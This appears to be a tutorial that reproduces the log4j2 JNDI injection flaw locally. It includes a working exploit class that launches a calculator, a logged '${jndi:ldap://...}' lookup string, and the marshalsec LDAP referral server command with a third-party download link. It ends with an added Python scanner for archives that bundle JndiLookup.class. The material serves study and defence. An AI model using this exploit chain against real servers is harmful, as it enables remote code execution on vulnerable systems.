Reproducing the log4j2 issue
1. Without further ado, let's get straight to it
Maven dependencies
Directory structure
Exp.java
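```java
class Exploit {
    Exploit() {
    }

    // Static initializer: runs as soon as the JVM initializes this class.
    static {
        System.err.println("Pwned");
        try {
            // Launches the Windows calculator as visible proof of execution.
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```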
Log4j2Test
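```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4j2Test {
    public static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // The logged message contains a JNDI lookup pointing at the local LDAP server.
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}
```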
\src\test\java>javac exp.java
This compiles it into a .class file.
marshalsec-0.0.3-SNAPSHOT-all.jar (download address for the required jar):
> http://www.btyear.com/csdn/1974.html#
Run the following in cmd from the corresponding directory:
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888
```
Then run the main method.
You may run into this bug:
Failed to execute goal org.codehaus.mojo:exec-maven-plugin:1.6.0:exec (default-cli) on project
```xml
<build>
    <plugins>
        <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.6.0</version>
            <executions>
                <execution>
                    <goals>
                        <goal>java</goal>
                    </goals>
                </execution>
            </executions>
            <configuration>
                <classpathScope>test</classpathScope>
            </configuration>
        </plugin>
    </plugins>
</build>
```
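For the defensive side of this reproduction, here is an added example in Python (not code from the original post): it lists archives, including jars nested inside a WAR, that bundle `JndiLookup.class`, the log4j-core class that resolves `${jndi:...}` lookups like the one logged in `Log4j2Test`. The archive names and contents built in `demo()` are constructed sample data.

```python
import io
import pathlib
import zipfile

# log4j-core class that resolves ${jndi:...} lookups.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def find_jndi(data, label, depth=0, max_depth=4):
    """Return labels of archives that ship JndiLookup; nested ones read outer!/inner."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []  # renamed or corrupt file: nothing to inspect
    hits = []
    with zf:
        for name in zf.namelist():
            if name == JNDI_LOOKUP:
                hits.append(label)
            elif name.lower().endswith(ARCHIVE_EXT) and depth < max_depth:
                hits += find_jndi(zf.read(name), f"{label}!/{name}", depth + 1, max_depth)
    return hits


def scan_tree(root):
    """Scan every archive below root, e.g. a build output or deployment directory."""
    hits = []
    for path in sorted(pathlib.Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_EXT:
            hits += find_jndi(path.read_bytes(), str(path))
    return hits


def build_zip(entries):
    """Build an in-memory archive from {name: bytes}; used for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo():
    """Constructed sample: a WAR holding one full and one stripped jar (made-up names)."""
    full = build_zip({JNDI_LOOKUP: b"\xca\xfe\xba\xbe"})
    stripped = build_zip({"org/apache/logging/log4j/core/Logger.class": b"\xca\xfe\xba\xbe"})
    war = build_zip({"WEB-INF/lib/core-full.jar": full, "WEB-INF/lib/core-stripped.jar": stripped})
    return find_jndi(war, "app.war")
```

A hit only shows that the class is bundled; whether the archive is affected depends on its log4j-core version, so treat the output as a list of jars to check.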